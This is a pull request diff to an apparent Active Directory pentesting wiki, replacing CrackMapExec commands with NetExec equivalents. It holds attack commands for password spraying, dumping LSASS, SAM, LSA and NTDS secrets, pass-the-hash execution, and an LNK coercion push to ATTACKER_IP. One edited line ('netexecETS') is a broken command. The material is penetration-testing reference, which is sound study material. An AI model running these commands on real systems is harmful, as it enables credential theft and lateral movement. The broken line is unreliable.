### PR TITLE
Switch archived cme to new nxc tool

### DIFF
--- a/ad/movement/ad-cs/README.md
+++ b/ad/movement/ad-cs/README.md
@@ -48,11 +48,11 @@ An initial indicator is the "Cert Publishers" built-in group whose members usual
 Alternatively, information like the PKI's CA and DNS names can be gathered through LDAP.
 
 {% tabs %}
-{% tab title="CrackMapExec" %}
-[CrackMapExec](https://github.com/mpgn/CrackMapExec)'s [adcs](https://github.com/mpgn/CrackMapExec/blob/master/cme/modules/adcs.py) module (Python) can be used to find PKI enrollment services in AD.
+{% tab title="netexec" %}
+ [netexec](https://github.com/Pennyw0rth/NetExec)'s [adcs](https://github.com/Pennyw0rth/NetExec/blob/master/cme/modules/adcs.py) module (Python) can be used to find PKI enrollment services in AD.
 
 ```bash
-crackmapexec ldap 'domaincontroller' -d 'domain' -u 'user' -p 'password' -M adcs
+netexec ldap 'domaincontroller' -d 'domain' -u 'user' -p 'password' -M adcs
 ```
 {% endtab %}
 

--- a/ad/movement/credentials/bruteforcing/guessing.md
+++ b/ad/movement/credentials/bruteforcing/guessing.md
@@ -21,19 +21,19 @@ There are three major types of credential guessing.
 Depending on the target service, different lists of common passwords (e.g. [the SecLists ones](https://github.com/danielmiessler/SecLists/tree/master/Passwords/Common-Credentials)) and different tools can be used.
 
 * [Hydra](https://github.com/vanhauser-thc/thc-hydra) (C) can be used against **a lot (50+)** of services like FTP, HTTP, IMAP, LDAP, MS-SQL, MYSQL, RDP, SMB, SSH and many many more.
-* [CrackMapExec](https://github.com/mpgn/CrackMapExec) (Python) can be used against LDAP, WinRM, SMB, SSH and MS-SQL.
+* [NetExec](https://github.com/Pennyw0rth/NetExec) (Python) can be used against LDAP, WinRM, SMB, SSH and MS-SQL.
 * [Kerbrute](https://github.com/ropnop/kerbrute) (Go) and [smartbrute](https://github.com/ShutdownRepo/smartbrute) (Python) can be used against [Kerberos pre-authentication](../../kerberos/pre-auth-bruteforce.md).
 
 {% hint style="info" %}
-CrackMapExec has useful options for password guessing
+netexec has useful options for password guessing
 
 * `--no-bruteforce`: tries user1 -> password1, user2 -> password2 instead of trying every password for every user
 * `--continue-on-success`: continues authentication attempts even after successes
 
 Smartbrute has equivalent features
 
-* `--line-per-line`: equivalent of crackmapexec's `--no-bruteforce` option
-* `--stop-on-success`: reversed equivalent of crackmapexec's `--continue-on-success` option
+* `--line-per-line`: equivalent of netexec's `--no-bruteforce` option
+* `--stop-on-success`: reversed equivalent of netexec's `--continue-on-success` option
 {% endhint %}
 
 ### Default passwords

--- a/ad/movement/credentials/bruteforcing/password-spraying.md
+++ b/ad/movement/credentials/bruteforcing/password-spraying.md
@@ -7,8 +7,8 @@ description: MITRE ATT&CK™ Sub-technique T1110.003
 Credential spraying is a technique that attackers use to try a few passwords (or keys) against a set of usernames instead of a single one. This technique is just [credential guessing](guessing.md) but "sprayed" (i.e. against multiple accounts) and tools that can do [credential guessing](guessing.md) can usually do spraying.
 
 ```bash
-# crackmapexec example
-cme smb target_ip -d domain.local -u users.txt -p "password" --no-bruteforce --continue-on-succes
+# netexec example
+nxc smb target_ip -d domain.local -u users.txt -p "password" --no-bruteforce --continue-on-succes
 
 # smartbrute example (dynamic user list)
 smartbrute smart -bp "password" kerberos -d "$DOMAIN" -u "$USER" -p "$PASSWORD" --kdc-ip "$KDC" kerberos

--- a/ad/movement/credentials/dumping/lsass.md
+++ b/ad/movement/credentials/dumping/lsass.md
@@ -16,7 +16,7 @@ The Local Security Authority Subsystem Service (LSASS) is a Windows service resp
 
 * several dumping methods: comsvcs.dll, [ProcDump](https://docs.microsoft.com/en-us/sysinternals/downloads/procdump), [Dumpert](https://github.com/outflanknl/Dumpert)
 * several authentication methods: like [pass-the-hash](../../ntlm/pth.md) (NTLM), or [pass-the-ticket](../../kerberos/ptt.md) (Kerberos)
-* it can be used either as a standalone script, as a [CrackMapExec](https://github.com/mpgn/CrackMapExec) module or as a Python library
+* it can be used either as a standalone script, as a [NetExec](https://github.com/Pennyw0rth/NetExec) module or as a Python library
 * it can interact with a Neo4j database to set [BloodHound](https://github.com/BloodHoundAD/BloodHound) targets as "owned"
 
 ```bash
@@ -29,11 +29,11 @@ lsassy -d $DOMAIN -u $USER -H $NThash $TARGETS
 # With pass-the-ticket (Kerberos)
 lsassy -k $TARGETS
 
-# CrackMapExec Module examples
-crackmapexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy
-crackmapexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
-crackmapexec smb $TARGETS -k -M lsassy
-crackmapexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
+# netexec Module examples
+netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy
+netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
+netexec smb $TARGETS -k -M lsassy
+netexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
 ```
 {% endtab %}
 

--- a/ad/movement/credentials/dumping/sam-and-lsa-secrets.md
+++ b/ad/movement/credentials/dumping/sam-and-lsa-secrets.md
@@ -114,21 +114,21 @@ secretsdump.py -sam '/path/to/sam.save' -security '/path/to/security.save' -syst
 ```
 {% endtab %}
 
-{% tab title="CrackMapExec" %}
-[CrackMapExec](https://github.com/mpgn/CrackMapExec) (Python) can be used to remotely dump SAM and LSA secrets, on multiple hosts. It offers several authentication methods like [pass-the-hash](../../ntlm/pth.md) (NTLM), or [pass-the-ticket](../../kerberos/ptt.md) (Kerberos)
+{% tab title="netexec" %}
+[NetExec](https://github.com/Pennyw0rth/NetExec) (Python) can be used to remotely dump SAM and LSA secrets, on multiple hosts. It offers several authentication methods like [pass-the-hash](../../ntlm/pth.md) (NTLM), or [pass-the-ticket](../../kerberos/ptt.md) (Kerberos)
 
 ```bash
 # Remote dumping of SAM/LSA secrets
-crackmapexec smb $TARGETS -d $DOMAIN -u $USER -p $PASSWORD --sam/--lsa
+netexec smb $TARGETS -d $DOMAIN -u $USER -p $PASSWORD --sam/--lsa
 
 # Remote dumping of SAM/LSA secrets (local user authentication)
-crackmapexec smb $TARGETS --local-auth -u $USER -p $PASSWORD --sam/--lsa
+netexec smb $TARGETS --local-auth -u $USER -p $PASSWORD --sam/--lsa
 
 # Remote dumping of SAM/LSA secrets (pass-the-hash)
-crackmapexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --sam/--lsa
+netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --sam/--lsa
 
 # Remote dumping of SAM/LSA secrets (pass-the-ticket)
-crackmapexec smb $TARGETS --kerberos --sam/--lsa
+netexec smb $TARGETS --kerberos --sam/--lsa
 ```
 {% endtab %}
 
@@ -152,7 +152,7 @@ lsadump::secrets /security:'C:\path\to\security.save' /system:'C:\path\to\system
 {% endtabs %}
 
 {% hint style="info" %}
-**Nota bene** secretsdump and crackmapexec both extract security questions, if any, from the LSA. They are json formatted, UTF-16-LE encoded, and hex encoded on top of that.
+**Nota bene** secretsdump and netexec both extract security questions, if any, from the LSA. They are json formatted, UTF-16-LE encoded, and hex encoded on top of that.
 {% endhint %}
 
 ## Resources

--- a/ad/movement/dacl/readlapspassword.md
+++ b/ad/movement/dacl/readlapspassword.md
@@ -10,14 +10,14 @@ From UNIX-like systems, [pyLAPS](https://github.com/p0dalirius/pyLAPS) (Python) 
 pyLAPS.py --action get -d 'DOMAIN' -u 'USER' -p 'PASSWORD' --dc-ip 192.168.56.101
 ```
 
-Alternatively, [CrackMapExec](https://github.com/mpgn/CrackMapExec) also has this ability (since v5.1.6).. In case it doesn't work [this public module](https://github.com/T3KX/Crackmapexec-LAPS) for CrackMapExec could also be used.
+Alternatively, [NetExec](https://github.com/Pennyw0rth/NetExec) also has this ability. In case it doesn't work [this public module](https://github.com/T3KX/Crackmapexec-LAPS) for CrackMapExec could also be used.
 
 ```bash
 # Default command
-cme ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps
+nxc ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps
 
 # The COMPUTER filter can be the name or wildcard (e.g. WIN-S10, WIN-* etc. Default: *)
-cme ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps -O computer="target-*"
+nxc ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --module laps -O computer="target-*"
 ```
 
 Impacket's ntlmrelayx also carries that feature, usable with the `--dump-laps`.

--- a/ad/movement/domain-settings/machineaccountquota.md
+++ b/ad/movement/domain-settings/machineaccountquota.md
@@ -18,10 +18,10 @@ There are multiple ways attackers can leverage that power.
 
 {% tabs %}
 {% tab title="UNIX-like" %}
-The [MachineAccountQuota](https://github.com/ShutdownRepo/CrackMapExec-MachineAccountQuota) module (for [CrackMapExec](https://github.com/mpgn/CrackMapExec)) can be used to check the value of the MachineAccountQuota attribute.
+The [MachineAccountQuota](https://github.com/ShutdownRepo/CrackMapExec-MachineAccountQuota) module (for [NetExec](https://github.com/Pennyw0rth/NetExec)) can be used to check the value of the MachineAccountQuota attribute.
 
 ```bash
-cme ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD -M maq
+nxc ldap $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD -M maq
 ```
 
 Alternatively, it can be done manually with the following Python code.

--- a/ad/movement/domain-settings/pre-windows-2000-computers.md
+++ b/ad/movement/domain-settings/pre-windows-2000-computers.md
@@ -15,7 +15,7 @@ Finding computer accounts that have been "pre-created" (i.e. manually created in
 
 The `logonCount` attribute can be filtered as well.
 
-The [ldapsearch-ad](https://github.com/yaap7/ldapsearch-ad) tool can be used to find such accounts. Once "pre-created" computer accounts that have not authenticated are found, they should be usable with their lowercase name set as their password. This can be tested with [CrackMapExec](https://github.com/mpgn/CrackMapExec) (Python) for instance.
+The [ldapsearch-ad](https://github.com/yaap7/ldapsearch-ad) tool can be used to find such accounts. Once "pre-created" computer accounts that have not authenticated are found, they should be usable with their lowercase name set as their password. This can be tested with [NetExec](https://github.com/Pennyw0rth/NetExec) (Python) for instance.
 
 <pre class="language-bash" data-overflow="wrap"><code class="lang-bash"><strong># 1. find pre-created accounts that never logged on
 </strong><strong>ldapsearch-ad -l $LDAP_SERVER -d $DOMAIN -u $USERNAME -p $PASSWORD -t search -s '(&#x26;(userAccountControl=4128)(logonCount=0))' | tee results.txt
@@ -27,7 +27,7 @@ cat results.txt | grep "sAMAccountName" | awk '{print $4}' | tee computers.txt
 cat results.txt | grep "sAMAccountName" | awk '{print tolower($4)}' | tr -d '$' | tee passwords.txt
 
 # 4. bruteforce, line per line (user1:password1, user2:password2, ...)
-cme smb $DC_IP -u "computers.txt" -p "passwords.txt" --no-bruteforce</code></pre>
+nxc smb $DC_IP -u "computers.txt" -p "passwords.txt" --no-bruteforce</code></pre>
 
 > You will see the error message **STATUS\_NOLOGON\_WORKSTATION\_TRUST\_ACCOUNT** when you have guessed the correct password for a computer account that has not been used yet. ([trustedsec.com](https://www.trustedsec.com/blog/diving-into-pre-created-computer-accounts/))
 

--- a/ad/movement/kerberos/asreproast.md
+++ b/ad/movement/kerberos/asreproast.md
@@ -34,10 +34,10 @@ GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -dc-ip $K
 GetNPUsers.py -request -format hashcat -outputfile ASREProastables.txt -hashes 'LMhash:NThash' -dc-ip $KeyDistributionCenter 'DOMAIN/USER'
 ```
 
-This can also be achieved with [CrackMapExec](https://github.com/mpgn/CrackMapExec) (Python).
+This can also be achieved with [NetExec](https://github.com/Pennyw0rth/NetExec) (Python).
 
 ```bash
-crackmapexec ldap $TARGETS -u $USER -p $PASSWORD --asreproast ASREProastables.txt --KdcHost $KeyDistributionCenter
+netexec ldap $TARGETS -u $USER -p $PASSWORD --asreproast ASREProastables.txt --KdcHost $KeyDistributionCenter
 ```
 
 The [kerberoast](https://github.com/skelsec/kerberoast) pure-python toolkit is a good alternative to the tools mentioned above.

--- a/ad/movement/kerberos/kerberoast.md
+++ b/ad/movement/kerberos/kerberoast.md
@@ -38,10 +38,10 @@ GetUserSPNs.py -outputfile kerberoastables.txt -dc-ip $KeyDistributionCenter 'DO
 GetUserSPNs.py -outputfile kerberoastables.txt -hashes 'LMhash:NThash' -dc-ip $KeyDistributionCenter 'DOMAIN/USER'
 ```
 
-This can also be achieved with [CrackMapExec](https://github.com/mpgn/CrackMapExec) (Python).
+This can also be achieved with [NetExec](https://github.com/Pennyw0rth/NetExec) (Python).
 
 ```bash
-crackmapexec ldap $TARGETS -u $USER -p $PASSWORD --kerberoasting kerberoastables.txt --kdcHost $KeyDistributionCenter
+netexec ldap $TARGETS -u $USER -p $PASSWORD --kerberoasting kerberoastables.txt --kdcHost $KeyDistributionCenter
 ```
 
 Using [pypykatz](https://github.com/skelsec/pypykatz/wiki/Kerberos-spnroast-command) (Python) it is possible to request an RC4 encrypted ST even when AES encryption is enabled (and if RC4 is still accepted of course). The tool features an -e flag which specifies what encryption type should be requested (default to 23, i.e. RC4). Trying to crack `$krb5tgs$23` takes less time than for `krb5tgs$18`.

--- a/ad/movement/kerberos/ptt.md
+++ b/ad/movement/kerberos/ptt.md
@@ -72,19 +72,19 @@ The [Impacket](https://github.com/SecureAuthCorp/impacket) scripts like [secrets
 secretsdump.py -k $TARGET
 ```
 
-[CrackMapExec](https://github.com/mpgn/CrackMapExec) (Python) has the ability to do it on a set of targets. The `bh_owned` has the ability to set targets as "owned" in [BloodHound](https://github.com/BloodHoundAD/BloodHound) (see [dumping credentials from registry hives](../credentials/dumping/sam-and-lsa-secrets.md)).
+[NetExec](https://github.com/Pennyw0rth/NetExec) (Python) has the ability to do it on a set of targets. The `bh_owned` has the ability to set targets as "owned" in [BloodHound](https://github.com/BloodHoundAD/BloodHound) (see [dumping credentials from registry hives](../credentials/dumping/sam-and-lsa-secrets.md)).
 
 ```bash
-crackmapexec smb $TARGETS -k --sam
-crackmapexec smb $TARGETS -k --lsa
-crackmapexec smb $TARGETS -k --ntds
+netexec smb $TARGETS -k --sam
+netexec smb $TARGETS -k --lsa
+netexecETS -k --ntds
 ```
 
-[Lsassy](https://github.com/Hackndo/lsassy) (Python) has the ability to do it with higher success probabilities as it offers multiple dumping methods. This tool can set targets as "owned" in [BloodHound](https://github.com/BloodHoundAD/BloodHound). It works in standalone but also as a [CrackMapExec](https://github.com/mpgn/CrackMapExec) module (see [dumping credentials from lsass process memory](../credentials/dumping/lsass.md)).
+[Lsassy](https://github.com/Hackndo/lsassy) (Python) has the ability to do it with higher success probabilities as it offers multiple dumping methods. This tool can set targets as "owned" in [BloodHound](https://github.com/BloodHoundAD/BloodHound). It works in standalone but also as a [NetExec](https://github.com/Pennyw0rth/NetExec) module (see [dumping credentials from lsass process memory](../credentials/dumping/lsass.md)).
 
 ```bash
-crackmapexec smb $TARGETS -k -M lsassy
-crackmapexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
+netexec smb $TARGETS -k -M lsassy
+netexec smb $TARGETS -k -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
 lsassy -k $TARGETS
 ```
 
@@ -106,11 +106,11 @@ atexec.py -k 'DOMAIN/USER@TARGET'
 dcomexec.py -k 'DOMAIN/USER@TARGET'
 ```
 
-[CrackMapExec](https://github.com/mpgn/CrackMapExec) (Python) has the ability to do it on a set of targets
+[NetExec](https://github.com/Pennyw0rth/NetExec) (Python) has the ability to do it on a set of targets
 
 ```bash
-crackmapexec winrm $TARGETS -k -x whoami
-crackmapexec smb $TARGETS -k -x whoami
+netexec winrm $TARGETS -k -x whoami
+netexec smb $TARGETS -k -x whoami
 ```
 
 On Windows, legitimate tools like the [sysinternals](https://docs.microsoft.com/en-us/sysinternals/) [PsExec](https://docs.microsoft.com/en-us/sysinternals/downloads/psexec) ([download](https://live.sysinternals.com/)) can then be used to open a cmd using that ticket.

--- a/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md
+++ b/ad/movement/mitm-and-coerced-authentications/living-off-the-land.md
@@ -138,14 +138,14 @@ $lnk.Save()
 * LNK files can be mixed with some HTA: [LNK HTA Polyglot](https://hatching.io/blog/lnk-hta-polyglot/)
 {% endhint %}
 
-[CrackMapExec](https://github.com/mpgn/CrackMapExec) (Python) can be used to automatically push LNK files to a writeable share.
+[NetExec](https://github.com/Pennyw0rth/NetExec) (Python) can be used to automatically push LNK files to a writeable share.
 
 ```bash
 # Creation & upload
-cme smb "target" -d "domain" -u "user" -p "password" -M slinky -O NAME="SHARE" SERVER="ATTACKER_IP"
+nxc smb "target" -d "domain" -u "user" -p "password" -M slinky -O NAME="SHARE" SERVER="ATTACKER_IP"
 
 # Cleanup
-cme smb "target" -d "domain" -u "user" -p "password" -M slinky -O NAME="SHARE" SERVER="ATTACKER_IP" CLEANUP=True
+nxc smb "target" -d "domain" -u "user" -p "password" -M slinky -O NAME="SHARE" SERVER="ATTACKER_IP" CLEANUP=True
 ```
 {% endtab %}
 

--- a/ad/movement/mitm-and-coerced-authentications/webclient.md
+++ b/ad/movement/mitm-and-coerced-authentications/webclient.md
@@ -14,11 +14,11 @@ Attackers can remotely enumerate systems on which the WebClient is running, whic
 
 {% tabs %}
 {% tab title="UNIX-like" %}
-From UNIX-like systems, this can be achieved with [webclientservicescanner](https://github.com/Hackndo/WebclientServiceScanner) (Python) or using [CrackMapExec](https://github.com/mpgn/CrackMapExec) (Python).
+From UNIX-like systems, this can be achieved with [webclientservicescanner](https://github.com/Hackndo/WebclientServiceScanner) (Python) or using [NetExec](https://github.com/Pennyw0rth/NetExec) (Python).
 
 ```bash
 webclientservicescanner 'domain.local'/'user':'password'@'machine'
-crackmapexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav
+netexec smb 'TARGETS' -d 'domain' -u 'user' -p 'password' -M webdav
 ```
 {% endtab %}
 

--- a/ad/movement/ntlm/pth.md
+++ b/ad/movement/ntlm/pth.md
@@ -10,7 +10,7 @@ An attacker knowing a user's NT hash can use it to authenticate over NTLM (pass-
 
 ## Practice
 
-There are many tools that implement pass-the-hash: [Impacket scripts](https://github.com/SecureAuthCorp/impacket) (Python) ([psexec](https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py), [smbexec](https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py), [secretsdump](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py)...), [CrackMapExec](https://github.com/mpgn/CrackMapExec) (Python), [FreeRDP](https://github.com/FreeRDP/FreeRDP) (C), [mimikatz](https://github.com/gentilkiwi/mimikatz) (C), [lsassy](https://github.com/Hackndo/lsassy) (Python), [pth-toolkit](https://github.com/byt3bl33d3r/pth-toolkit) (Python) and many more.
+There are many tools that implement pass-the-hash: [Impacket scripts](https://github.com/SecureAuthCorp/impacket) (Python) ([psexec](https://github.com/SecureAuthCorp/impacket/blob/master/examples/psexec.py), [smbexec](https://github.com/SecureAuthCorp/impacket/blob/master/examples/smbexec.py), [secretsdump](https://github.com/SecureAuthCorp/impacket/blob/master/examples/secretsdump.py)...), [NetExec](https://github.com/Pennyw0rth/NetExec) (Python), [FreeRDP](https://github.com/FreeRDP/FreeRDP) (C), [mimikatz](https://github.com/gentilkiwi/mimikatz) (C), [lsassy](https://github.com/Hackndo/lsassy) (Python), [pth-toolkit](https://github.com/byt3bl33d3r/pth-toolkit) (Python) and many more.
 
 {% tabs %}
 {% tab title="Credentials dumping" %}
@@ -22,19 +22,19 @@ secretsdump.py -hashes ':NThash' 'DOMAIN/USER@TARGET'
 secretsdump.py 'DOMAIN/USER:PASSWORD@TARGET'
 ```
 
-[CrackMapExec](https://github.com/mpgn/CrackMapExec) (Python) has the ability to do it on a set of targets. The `bh_owned` has the ability to set targets as "owned" in [BloodHound](https://github.com/BloodHoundAD/BloodHound) (see [dumping credentials from registry hives](../credentials/dumping/sam-and-lsa-secrets.md)).
+[NetExec](https://github.com/Pennyw0rth/NetExec) (Python) has the ability to do it on a set of targets. The `bh_owned` has the ability to set targets as "owned" in [BloodHound](https://github.com/BloodHoundAD/BloodHound) (see [dumping credentials from registry hives](../credentials/dumping/sam-and-lsa-secrets.md)).
 
 ```bash
-crackmapexec smb $TARGETS -u $USER -H $NThash --sam --local-auth
-crackmapexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --lsa
-crackmapexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --ntds
+netexec smb $TARGETS -u $USER -H $NThash --sam --local-auth
+netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --lsa
+netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash --ntds
 ```
 
-[Lsassy](https://github.com/Hackndo/lsassy) (Python) has the ability to do it with higher success probabilities as it offers multiple dumping methods. This tool can set targets as "owned" in [BloodHound](https://github.com/BloodHoundAD/BloodHound). It works in standalone but also as a [CrackMapExec](https://github.com/mpgn/CrackMapExec) module (see [dumping credentials from lsass process memory](../credentials/dumping/lsass.md)).
+[Lsassy](https://github.com/Hackndo/lsassy) (Python) has the ability to do it with higher success probabilities as it offers multiple dumping methods. This tool can set targets as "owned" in [BloodHound](https://github.com/BloodHoundAD/BloodHound). It works in standalone but also as a [NetExec](https://github.com/Pennyw0rth/NetExec) module (see [dumping credentials from lsass process memory](../credentials/dumping/lsass.md)).
 
 ```bash
-crackmapexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy
-crackmapexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
+netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy
+netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -M lsassy -o BLOODHOUND=True NEO4JUSER=neo4j NEO4JPASS=Somepassw0rd
 lsassy -u $USER -H $NThash $TARGETS
 lsassy -d $DOMAIN -u $USER -H $NThash $TARGETS
 ```
@@ -51,12 +51,12 @@ atexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
 dcomexec.py -hashes 'LMhash:NThash' 'DOMAIN/USER@TARGET'
 ```
 
-[CrackMapExec](https://github.com/mpgn/CrackMapExec) (Python) has the ability to do it on a set of targets
+[NetExec](https://github.com/Pennyw0rth/NetExec) (Python) has the ability to do it on a set of targets
 
 ```bash
-crackmapexec winrm $TARGETS -d $DOMAIN -u $USER -p $PASSWORD -x whoami
-crackmapexec smb $TARGETS --local-auth -u $USER -H $NThash -x whoami
-crackmapexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -x whoami
+netexec winrm $TARGETS -d $DOMAIN -u $USER -p $PASSWORD -x whoami
+netexec smb $TARGETS --local-auth -u $USER -H $NThash -x whoami
+netexec smb $TARGETS -d $DOMAIN -u $USER -H $NThash -x whoami
 ```
 
 On Windows, [mimikatz](https://github.com/gentilkiwi/mimikatz) (C) can pass-the-hash and open an elevated command prompt with [`sekurlsa::pth`](https://tools.thehacker.recipes/mimikatz/modules/sekurlsa/pth).

--- a/ad/movement/ntlm/relay.md
+++ b/ad/movement/ntlm/relay.md
@@ -82,10 +82,10 @@ For more details on how NTLM works, testers can read [the MS-NLMP doc](https://w
 
 ### Detection
 
-From UNIX-like systems, [CrackMapExec](https://github.com/mpgn/CrackMapExec) (Python) and [LdapRelayScan](https://github.com/zyn3rgy/LdapRelayScan) (Python) can be used to identify [signing](relay.md#session-signing) and [channel binding](relay.md#epa-extended-protection-for-authentication) requirements for SMB, LDAP and LDAPS.
+From UNIX-like systems, [NetExec](https://github.com/Pennyw0rth/NetExec) (Python) and [LdapRelayScan](https://github.com/zyn3rgy/LdapRelayScan) (Python) can be used to identify [signing](relay.md#session-signing) and [channel binding](relay.md#epa-extended-protection-for-authentication) requirements for SMB, LDAP and LDAPS.
 
 ```bash
-crackmapexec smb $target
+netexec smb $target
 LdapRelayScan.py -u "user" -p "password" -dc-ip "DC_IP_address" -method BOTH
 ```
 
@@ -242,10 +242,10 @@ someserver.domain.lan
 {% endhint %}
 
 {% hint style="info" %}
-[CrackMapExec](https://github.com/mpgn/CrackMapExec) (Python) has the ability to generate the list of possible targets for relay to SMB (hosts with SMB signing not required).
+[NetExec](https://github.com/Pennyw0rth/NetExec) (Python) has the ability to generate the list of possible targets for relay to SMB (hosts with SMB signing not required).
 
 ```bash
-crackmapexec smb --gen-relay-list targets.txt $SUBNET
+netexec smb --gen-relay-list targets.txt $SUBNET
 ```
 {% endhint %}
 

--- a/ad/recon/dns.md
+++ b/ad/recon/dns.md
@@ -92,10 +92,10 @@ bloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" get dnsDump
 
 {% endtab %}
 
-{% tab title="crackmapexec" %}
-CrackMapExec's [Enum_dns](https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-enum_dns) module utilizes WMI to dump DNS information from an Active Directory DNS Server. It extracts `MicrosoftDNS_ResourceRecord` (complete zone information) from all found domains.
+{% tab title="netexec" %}
+netexec's [Enum_dns](https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-enum_dns) module utilizes WMI to dump DNS information from an Active Directory DNS Server. It extracts `MicrosoftDNS_ResourceRecord` (complete zone information) from all found domains.
 ```bash
-crackmapexec smb -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -M enum_dns
+netexec smb -u <USERNAME> -p <PASSWORD> -d <DOMAIN> -M enum_dns
 ```
 {% hint style="info" %}
 So far this module only works with Administrative privileges.

--- a/ad/recon/ldap.md
+++ b/ad/recon/ldap.md
@@ -68,7 +68,7 @@ ntlmrelayx -t "ldap://domaincontroller" --dump-adcs --dump-laps --dump-gmsa
 {% endtab %}
 {% endtabs %}
 
-[CrackMapExec](https://github.com/mpgn/CrackMapExec) (Python) also has useful modules that can be used to
+[NetExec](https://github.com/Pennyw0rth/NetExec) (Python) also has useful modules that can be used to
 
 * map information regarding [AD-CS (Active Directory Certificate Services)](../movement/ad-cs/)
 * show subnets listed in AD-SS (Active Directory Sites and Services)
@@ -77,19 +77,19 @@ ntlmrelayx -t "ldap://domaincontroller" --dump-adcs --dump-laps --dump-gmsa
 
 ```bash
 # list PKIs/CAs
-cme ldap "domain_controller" -d "domain" -u "user" -p "password" -M adcs
+nxc ldap "domain_controller" -d "domain" -u "user" -p "password" -M adcs
 
 # list subnets referenced in AD-SS
-cme ldap "domain_controller" -d "domain" -u "user" -p "password" -M subnets
+nxc ldap "domain_controller" -d "domain" -u "user" -p "password" -M subnets
 
 # machine account quota
-cme ldap "domain_controller" -d "domain" -u "user" -p "password" -M maq
+nxc ldap "domain_controller" -d "domain" -u "user" -p "password" -M maq
 
 # users description
-cme ldap "domain_controller" -d "domain" -u "user" -p "password" -M get-desc-users
+nxc ldap "domain_controller" -d "domain" -u "user" -p "password" -M get-desc-users
 ```
 
-The PowerShell equivalent to CrackMapExec's `subnets` modules is the following
+The PowerShell equivalent to netexec's `subnets` modules is the following
 
 ```powershell
 [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest().Sites.Subnets

--- a/ad/recon/password-policy.md
+++ b/ad/recon/password-policy.md
@@ -6,14 +6,14 @@ In order to fine-tune this, the password policy can be obtained. This policy can
 
 {% tabs %}
 {% tab title="UNIX-like" %}
-On UNIX-like systems, there are many alternatives that allow obtaining the password policy like [polenum](https://github.com/Wh1t3Fox/polenum) \(Python\), [CrackMapExec](https://github.com/mpgn/CrackMapExec) \(Python\), [ldapsearch-ad](https://github.com/yaap7/ldapsearch-ad) \(Python\) and [enum4linux](enum4linux.md).
+On UNIX-like systems, there are many alternatives that allow obtaining the password policy like [polenum](https://github.com/Wh1t3Fox/polenum) \(Python\), [NetExec](https://github.com/Pennyw0rth/NetExec) \(Python\), [ldapsearch-ad](https://github.com/yaap7/ldapsearch-ad) \(Python\) and [enum4linux](enum4linux.md).
 
 ```bash
 # polenum (obtained through MS-RPC)
 polenum -d $DOMAIN -u $USER -p $PASSWORD -d $DOMAIN
 
-# CrackMapExec (obtained through MS-RPC)
-cme smb $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --pass-pol
+# netexec (obtained through MS-RPC)
+nxc smb $DOMAIN_CONTROLLER -d $DOMAIN -u $USER -p $PASSWORD --pass-pol
 
 # ldapsearch-ad (obtained through LDAP)
 ldapsearch-ad.py -l $LDAP_SERVER -d $DOMAIN -u $USER -p $PASSWORD -t pass-pol

--- a/systems-and-services/movement/smb.md
+++ b/systems-and-services/movement/smb.md
@@ -34,10 +34,10 @@ smbmap -u '' -p '' -H $IP
 smbclient //$IP/$SHARE_NAME
 ```
 
-[CrackMapExec](https://github.com/mpgn/CrackMapExec) (Python) can be used to test for null session on multiple hosts.
+[NetExec](https://github.com/Pennyw0rth/NetExec) (Python) can be used to test for null session on multiple hosts.
 
 ```bash
-crackmapexec smb $TARGETS -u '' -p '' --shares
+netexec smb $TARGETS -u '' -p '' --shares
 ```
 {% endtab %}
 
@@ -77,7 +77,7 @@ Valid credentials can then be used to list accessible shares and enumerate the c
 
 ### Data exfiltration
 
-Tools like [smbclient](https://www.samba.org/samba/docs/current/man-html/smbclient.1.html) and [CrackMapExec](https://github.com/mpgn/CrackMapExec) can be used to recursively download a SMB share's content.
